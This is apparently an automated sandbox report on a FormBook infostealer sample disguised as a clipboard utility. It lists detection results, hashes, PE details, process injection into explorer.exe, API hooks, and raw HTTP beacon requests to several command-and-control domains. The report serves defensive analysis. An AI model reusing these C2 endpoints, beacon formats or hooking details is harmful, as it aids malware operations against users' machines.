          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | Input Capture 1 | Process Discovery 2 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph

          [Behavior graph image not preserved. Behavior Graph ID: 411767, Sample: ox87DNNM8d.exe, Startdate: 12/05/2021, Architecture: WINDOWS, Score: 100. Process chain shown: ox87DNNM8d.exe started ox87DNNM8d.exe, which injected into explorer.exe; explorer.exe started systray.exe, which started cmd.exe, which started conhost.exe.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          ox87DNNM8d.exe | 57% | Virustotal |
          ox87DNNM8d.exe | 41% | Metadefender |
          ox87DNNM8d.exe | 66% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          3.2.ox87DNNM8d.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          t181.deegeechina.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label | Link
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
          http://www.vstarfireworks.com/sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da | 0% | Avira URL Cloud | safe |
          http://www.americacivics.com/sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE | 0% | Avira URL Cloud | safe |
          http://www.tiro.com | 0% | URL Reputation | safe |
          http://www.goodfont.co.kr | 0% | URL Reputation | safe |
          www.panda810.com/sve/ | 0% | Avira URL Cloud | safe |
          http://www.carterandcone.coml | 0% | URL Reputation | safe |
          http://www.sajatypeworks.com | 0% | URL Reputation | safe |
          http://www.typography.netD | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
          http://fontfabrik.com | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
          http://www.dcsdeliveryaz.website/sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da | 0% | Avira URL Cloud | safe |
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
          http://www.sandoll.co.kr | 0% | URL Reputation | safe |
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
          http://www.sakkal.com | 0% | URL Reputation | safe |

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.americacivics.com | 35.186.238.101 | true | false | | unknown
          t181.deegeechina.com | 43.249.29.43 | true | true | | unknown
          www.dcsdeliveryaz.website | 75.119.206.89 | true | true | | unknown
          www.secureproductsolutions.net | unknown | unknown | true | | unknown
          www.vstarfireworks.com | unknown | unknown | true | | unknown

                  Contacted URLs

                  Name | Malicious | Antivirus Detection | Reputation
                  http://www.vstarfireworks.com/sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da | true | Avira URL Cloud: safe | unknown
                  http://www.americacivics.com/sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE | false | Avira URL Cloud: safe | unknown
                  www.panda810.com/sve/ | true | Avira URL Cloud: safe | low
                  http://www.dcsdeliveryaz.website/sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da | true | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries


                                          Contacted IPs

                                          Public

                                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                          35.186.238.101 | www.americacivics.com | United States | | 15169 | GOOGLEUS | false
                                          75.119.206.89 | www.dcsdeliveryaz.website | United States | | 26347 | DREAMHOST-ASUS | true
                                          43.249.29.43 | t181.deegeechina.com | Hong Kong | | 133115 | HKKFGL-AS-APHKKwaifongGroupLimitedHK | true

                                          General Information

                                          Joe Sandbox Version:32.0.0 Black Diamond
                                          Analysis ID:411767
                                          Start date:12.05.2021
                                          Start time:06:27:57
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 10m 59s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:ox87DNNM8d.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:28
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/1@4/3
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 28% (good quality ratio 25.8%)
                                          • Quality average: 69.6%
                                          • Quality standard deviation: 31.7%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 88
                                          • Number of non-executed functions: 73
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe

                                          Simulations

                                          Behavior and APIs

                                          Time | Type | Description
                                          06:28:47 | API Interceptor | 1x Sleep call for process: ox87DNNM8d.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          No context

                                          ASN


                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ox87DNNM8d.exe.log
                                          Process:C:\Users\user\Desktop\ox87DNNM8d.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1314
                                          Entropy (8bit):5.350128552078965
                                          Encrypted:false
                                          SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                          MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                          SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                          SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                          SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.613842542238479
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:ox87DNNM8d.exe
                                          File size:840704
                                          MD5:41e38bcd6f5f3001c2e4f08ebcd2396c
                                          SHA1:2f3b2173d7a5a3a19e8a73d5fbfde7abc1836909
                                          SHA256:4e2b4396335fc6d3e6ff8c19b326f0f6342f537ba026ce1901d2122b2c7b3e4c
                                          SHA512:20c03ac7e5647f2140f9c969046fd9aa86e18b352387e52238a1f652694a40a374aa499309827f71599de6cad899397a373bc9d3d1cc83e7ed8a37593d386bd4
                                          SSDEEP:24576:cAXIVpK3/ZWzEtY+i+/+He2yjmfNRp+n6:9EpK3/ZWYtYv0+He2emV+6
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.................0...........O... ...`....@.. ....................... ............@................................

                                          File Icon

                                          Icon Hash:f8ce929a929a92d4

                                          Static PE Info

                                          General

                                          Entrypoint:0x4b4fb2
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x60948AF6 [Fri May 7 00:33:58 2021 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb4f58 | 0x57 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x19eb8 | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb6000 | 0xc | .reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                          Sections

                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x2000 | 0xb2fb8 | 0xb3000 | False | 0.92964112692 | data | 7.93204508639 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .reloc | 0xb6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          .rsrc | 0xb8000 | 0x19eb8 | 0x1a000 | False | 0.0641432542067 | data | 2.31358815064 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          Name | RVA | Size | Type | Language | Country
                                          RT_ICON | 0xb8220 | 0xac5 | PNG image data, 256 x 256, 8-bit gray+alpha, non-interlaced | |
                                          RT_ICON | 0xb8ce8 | 0xb20 | data | |
                                          RT_ICON | 0xb9808 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 16777215, next used block 16777215 | |
                                          RT_ICON | 0xbbdb0 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 16777215, next used block 16777215 | |
                                          RT_ICON | 0xbce58 | 0x10828 | data | |
                                          RT_ICON | 0xcd680 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 16777215, next used block 16777215 | |
                                          RT_GROUP_ICON | 0xd18a8 | 0x5a | data | |
                                          RT_VERSION | 0xd1904 | 0x400 | data | |
                                          RT_MANIFEST | 0xd1d04 | 0x1b4 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | |

                                          Imports

                                          DLL | Import
                                          mscoree.dll | _CorExeMain

                                          Version Infos

                                          Description | Data
                                          Translation | 0x0000 0x04b0
                                          LegalCopyright | Crowbar 2015. This software is licensed under the GNU General Public License v3.0 or above.
                                          Assembly Version | 1.0.0.0
                                          InternalName | DateTimeNative.exe
                                          FileVersion | 1.0.0.0
                                          CompanyName | Crowbar
                                          LegalTrademarks |
                                          Comments | Awesome clipboard manager.
                                          ProductName | Clippy
                                          ProductVersion | 1.0.0.0
                                          FileDescription | Clippy
                                          OriginalFilename | DateTimeNative.exe

                                          Network Behavior

                                          Snort IDS Alerts

                                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                          05/12/21-06:30:28.857747 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49728 | 35.186.238.101 | 192.168.2.5

                                          TCP Packets


                                          UDP Packets


                                          DNS Queries

                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                          May 12, 2021 06:29:48.188477993 CEST | 192.168.2.5 | 8.8.8.8 | 0x9fe0 | Standard query (0) | www.secureproductsolutions.net | A (IP address) | IN (0x0001)
                                          May 12, 2021 06:30:08.481898069 CEST | 192.168.2.5 | 8.8.8.8 | 0xba98 | Standard query (0) | www.dcsdeliveryaz.website | A (IP address) | IN (0x0001)
                                          May 12, 2021 06:30:28.614039898 CEST | 192.168.2.5 | 8.8.8.8 | 0x26ee | Standard query (0) | www.americacivics.com | A (IP address) | IN (0x0001)
                                          May 12, 2021 06:30:51.048041105 CEST | 192.168.2.5 | 8.8.8.8 | 0x89c | Standard query (0) | www.vstarfireworks.com | A (IP address) | IN (0x0001)

                                          DNS Answers

                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                          May 12, 2021 06:29:48.268415928 CEST | 8.8.8.8 | 192.168.2.5 | 0x9fe0 | Name error (3) | www.secureproductsolutions.net | none | none | A (IP address) | IN (0x0001)
                                          May 12, 2021 06:30:08.707669020 CEST | 8.8.8.8 | 192.168.2.5 | 0xba98 | No error (0) | www.dcsdeliveryaz.website | | 75.119.206.89 | A (IP address) | IN (0x0001)
                                          May 12, 2021 06:30:28.675231934 CEST | 8.8.8.8 | 192.168.2.5 | 0x26ee | No error (0) | www.americacivics.com | | 35.186.238.101 | A (IP address) | IN (0x0001)
                                          May 12, 2021 06:30:51.398247957 CEST | 8.8.8.8 | 192.168.2.5 | 0x89c | No error (0) | www.vstarfireworks.com | t181.deegeechina.com | | CNAME (Canonical name) | IN (0x0001)
                                          May 12, 2021 06:30:51.398247957 CEST | 8.8.8.8 | 192.168.2.5 | 0x89c | No error (0) | t181.deegeechina.com | | 43.249.29.43 | A (IP address) | IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.dcsdeliveryaz.website
                                          • www.americacivics.com
                                          • www.vstarfireworks.com

                                          HTTP Packets

                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.2.5 | 49720 | 75.119.206.89 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          May 12, 2021 06:30:08.932787895 CEST | 1393 | OUT | GET /sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da HTTP/1.1
                                          Host: www.dcsdeliveryaz.website
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          May 12, 2021 06:30:09.236999989 CEST | 1394 | IN | HTTP/1.1 301 Moved Permanently
                                          Date: Wed, 12 May 2021 04:30:09 GMT
                                          Server: Apache
                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                          Upgrade: h2
                                          Connection: Upgrade, close
                                          Location: http://dcsdeliveryaz.website/sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da
                                          Vary: User-Agent
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.2.5 | 49728 | 35.186.238.101 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          May 12, 2021 06:30:28.721317053 CEST | 4707 | OUT | GET /sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE HTTP/1.1
                                          Host: www.americacivics.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          May 12, 2021 06:30:28.857747078 CEST | 4707 | IN | HTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Wed, 12 May 2021 04:30:28 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "6099a39b-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          2 | 192.168.2.5 | 49730 | 43.249.29.43 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          May 12, 2021 06:30:51.676578999 CEST | 4725 | OUT | GET /sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da HTTP/1.1
                                          Host: www.vstarfireworks.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          May 12, 2021 06:30:51.971482038 CEST | 4727 | IN | HTTP/1.1 404 Not Found
                                          Cache-Control: no-store
                                          Pragma: no-cache
                                          Content-Type: text/html
                                          Server: IIS
                                          X-Powered-By: WAF/2.0
                                          Date: Wed, 12 May 2021 05:07:40 GMT
                                          Connection: close
                                          Content-Length: 1163
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-si
                                          May 12, 2021 06:30:51.971520901 CEST | 4727 | IN |
                                          Data Ascii: ze:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;
                                          May 12, 2021 06:30:52.250524998 CEST | 4728 | IN |
                                          Data Ascii: ative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3>


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function Name | Hook Type | Active in Processes
                                          PeekMessageA | INLINE | explorer.exe
                                          PeekMessageW | INLINE | explorer.exe
                                          GetMessageW | INLINE | explorer.exe
                                          GetMessageA | INLINE | explorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function Name | Hook Type | New Data
                                          PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xEC
                                          PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xEC
                                          GetMessageW | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xEC
                                          GetMessageA | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xEC

                                          System Behavior

                                          General

                                          Start time: 06:28:46
                                          Start date: 12/05/2021
                                          Path: C:\Users\user\Desktop\ox87DNNM8d.exe
                                          Wow64 process (32bit): true
                                          Commandline: 'C:\Users\user\Desktop\ox87DNNM8d.exe'
                                          Imagebase: 0xb50000
                                          File size: 840704 bytes
                                          MD5 hash: 41E38BCD6F5F3001C2E4F08EBCD2396C
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: .Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation: low

                                          General

                                          Start time: 06:28:49
                                          Start date: 12/05/2021
                                          Path: C:\Users\user\Desktop\ox87DNNM8d.exe
                                          Wow64 process (32bit): true
                                          Commandline: C:\Users\user\Desktop\ox87DNNM8d.exe
                                          Imagebase: 0xfb0000
                                          File size: 840704 bytes
                                          MD5 hash: 41E38BCD6F5F3001C2E4F08EBCD2396C
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:06:28:52
                                          Start date:12/05/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:
                                          Imagebase:0x7ff693d90000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:06:29:10
                                          Start date:12/05/2021
                                          Path:C:\Windows\SysWOW64\systray.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\systray.exe
                                          Imagebase:0x7ff797770000
                                          File size:9728 bytes
                                          MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
